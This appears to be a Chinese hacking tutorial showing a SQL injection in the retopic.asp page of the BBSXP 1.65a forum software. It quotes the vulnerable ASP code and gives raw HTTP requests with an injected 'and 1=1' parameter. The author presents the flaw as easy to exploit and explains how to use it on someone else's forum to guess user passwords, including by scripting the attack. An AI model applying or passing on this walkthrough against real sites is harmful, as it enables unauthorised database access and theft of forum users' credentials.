不得不说，这个BBSXP的缩进实在是混乱，前些天调试retopic.asp的时候，真是把我看得差点把键盘都砸了。简简单单的几个if..then..else..endif跨度大得跟什么似的，看得我头皮发麻，两腿抽筋，最后幸亏editplus里面可以ctrl+]，不然真不知道最后要走多少弯路。嗯，火死了…… retopic.asp行199开始是这样子写的，仍然用老夫的背心打赌，这种程度的漏洞，只有高中生会犯，嘻嘻…… if Request("retopicid")<>"" then sql="select * from reforum where id="&Request("retopicid")&"" rs.Open sql,Conn else sql="select * from forum where ID="&Request("id")&" and forumid="&Request("forumid")&"" rs.Open sql,Conn end if 要一口咬定这个是漏洞，光乱说是不行的。这个地方，我测试了一下，确实有问题，如果大家有时间，可以下一个1.65a版下来看看，很容易利用，当然，如果大家只对方法感兴趣的话，往下面看吧。不过长时间不去思考，脑袋会退化的，:-)。 粗略一看，可以提交retopicid或者提交id和forumid来利用。由分析的结果可以知道，12行到169行是一个大大的if语句，如果进入了这个条件的话，那么会被一个succeed()函数结束掉，所以要绕开这个条件。我们还是从NC过去正常的提交着手，如果你不太清楚过程，请参看这个系列的（一）。 GET /bbsxp/retopic.asp?retopicid=wahahaha HTTP/1.1 Referer: http://localhost/bbsxp/showtopic.asp?id=1&forumid=1&page=0 User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: localhost Connection: Keep-Alive Cache-Control: no-cache Cookie: eremite=0; now=2002%2D7%2D3+19%3A24%3A39; onlinetime=2002%2D7%2D3+19%3A18%3A27; username=never; userpass=FuckUSA!!; addmin=0; skins=3; ASPSESSIONIDGGGGGLAG=FKPFCAMCKHEMGDOMCPKKKDIH 出错了，呵呵，返回来的数据有“非法操作”的字样。看看源代码，原来犯了一个错误，forumid没有提交，马上改正！NC过去，提交如下数据： GET /bbsxp/retopic.asp?forumid=1&retopicid=1%20and%201=1 HTTP/1.1 Referer: http://localhost/bbsxp/showtopic.asp?id=1&forumid=1&page=0 User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: localhost Connection: Keep-Alive Cache-Control: no-cache Cookie: eremite=0; now=2002%2D7%2D3+19%3A24%3A39; onlinetime=2002%2D7%2D3+19%3A18%3A27; username=never; userpass=FuckUSA!!; addmin=0; skins=3; ASPSESSIONIDGGGGGLAG=FKPFCAMCKHEMGDOMCPKKKDIH 哈哈，注入成功了吧？只要修改retopicid的值就可以慢慢的猜别人的密码了。其实要是提交id和forumid来利用，也是同样的方法，就不继续说了。一句话，写一个perl程序比较好，手工的话，呵呵…… 其实还有一个简单的方法，用提交id和forumid来利用。先到对方的BBSXP注册登陆，这样浏览器就记录了很多东西，我们只要在地址栏里面就可以猜了。